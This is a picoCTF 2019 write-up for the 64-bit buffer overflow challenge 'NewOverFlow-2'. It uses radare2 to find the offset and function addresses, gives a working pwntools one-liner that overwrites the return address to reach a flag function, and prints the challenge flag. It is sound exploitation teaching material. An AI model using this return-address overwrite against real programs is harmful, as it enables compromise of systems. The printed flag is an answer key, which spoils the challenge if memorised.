PicoCTF-2019 Writeup
  • HHousen PicoCTF-2019 Writeup
  • Binary Exploitation
    • L1im1tL355
    • messy-malloc
    • OverFlow 2
    • CanaRy
    • NewOverFlow-1
    • NewOverFlow-2
    • sice_cream
    • seed-sPRiNG
    • leap-frog
    • GoT
    • rop64
    • rop32
    • Ghost_Diary
    • zero_to_hero
    • Challenge Name
    • Heap overflow
    • slippery-shellcode
    • AfterLife
    • SecondLife
    • stringzz
  • Cryptography
    • la cifra de
    • b00tl3gRSA2
    • b00tl3gRSA3
    • AES-ABC
    • john_pollard
    • b00tl3gRSA2
    • waves over lambda
  • Forensics
    • What Lies Within
    • m00nwalk
    • shark on wire 1
    • shark on wire 2
    • Glory of the Garden
    • pastaAAA
    • Investigative Reversing 0
    • Investigative Reversing 1
    • extensions
    • investigation_encoded_1
    • Investigative Reversing 2
    • investigation_encoded_2
    • Investigative Reversing 3
    • like1000
    • Investigative Reversing 4
    • WebNet0
    • B1g_Mac
    • m00nwalk 2
    • WebNet1
    • WhitePages
    • So Meta
    • c0rrupt
  • Web Exploitation
    • Java Script Kiddie 2
    • Empire1
    • Empire2
    • cereal hacker 1
    • Empire3
    • cereal hacker 2
    • Java Script Kiddie
    • JaWT Scratchpad
    • Irish-Name-Repo 1
    • Irish-Name-Repo 2
    • Irish-Name-Repo 3
  • Reverse Engineering
    • Time's Up, Again!
    • Forky
    • droids0
    • Challenge Name
    • droids1
    • droids2
    • droids3
    • reverse_cipher
    • droids4
    • B1ll_Gat35
    • Time's Up
    • Time's Up, For the Last Time!
    • asm1
    • asm2
    • asm3
    • asm4
  • Challenge Name
Powered by GitBook
On this page
  • Problem
  • Solution
  • Flag

Was this helpful?

Edit on Git
  1. Binary Exploitation

NewOverFlow-2

Problem

Okay now lets try mainpulating arguments. program. You can find it in /problems/newoverflow-2_5_13f3d3dc09fc09d6d5db8adfa899a05d on the shell server. Source.

  • Program

  • Source

Solution

  1. The challenge author forgot to remove the flag function so this is solvable using the same method as NewOverFlow-1

  2. Find the offset/padding

    1. You can use the method described in rop64 with the cyclic and cyclic_find or you can use the following

    2. Open vuln in radare2 with r2 ./vuln

    3. Run aaaa

    4. Run pdf @ sym.vuln to get var int local_40h @ rbp-0x40

    5. The 0x40 is the buffer location so 8 more bytes are needed to get past the "saved ebp register"

    6. So the offset is 0x40+8

  3. Run afl~flag in radare2 to get the address of flag and afl~main to get the address of main.

  4. We can not offset and call the flag function directly because that would cause a stack misalignment in 64-bit. So instead we form out payload by doing padding + main_address + flag_address instead of just padding + flag_address as we would in 32-bit.

  5. We can use p64 from pwntools to convert the hex addresses to little endian.

  6. Payload complete: python2 -c "from pwn import *; print 'A'*(0x40+8) + p64(0x004008ce) + p64(0x0040084d)" | ./vuln

Flag

picoCTF{r0p_1t_d0nT_st0p_1t_b3358018}

PreviousNewOverFlow-1Nextsice_cream

Last updated 3 years ago

Was this helpful?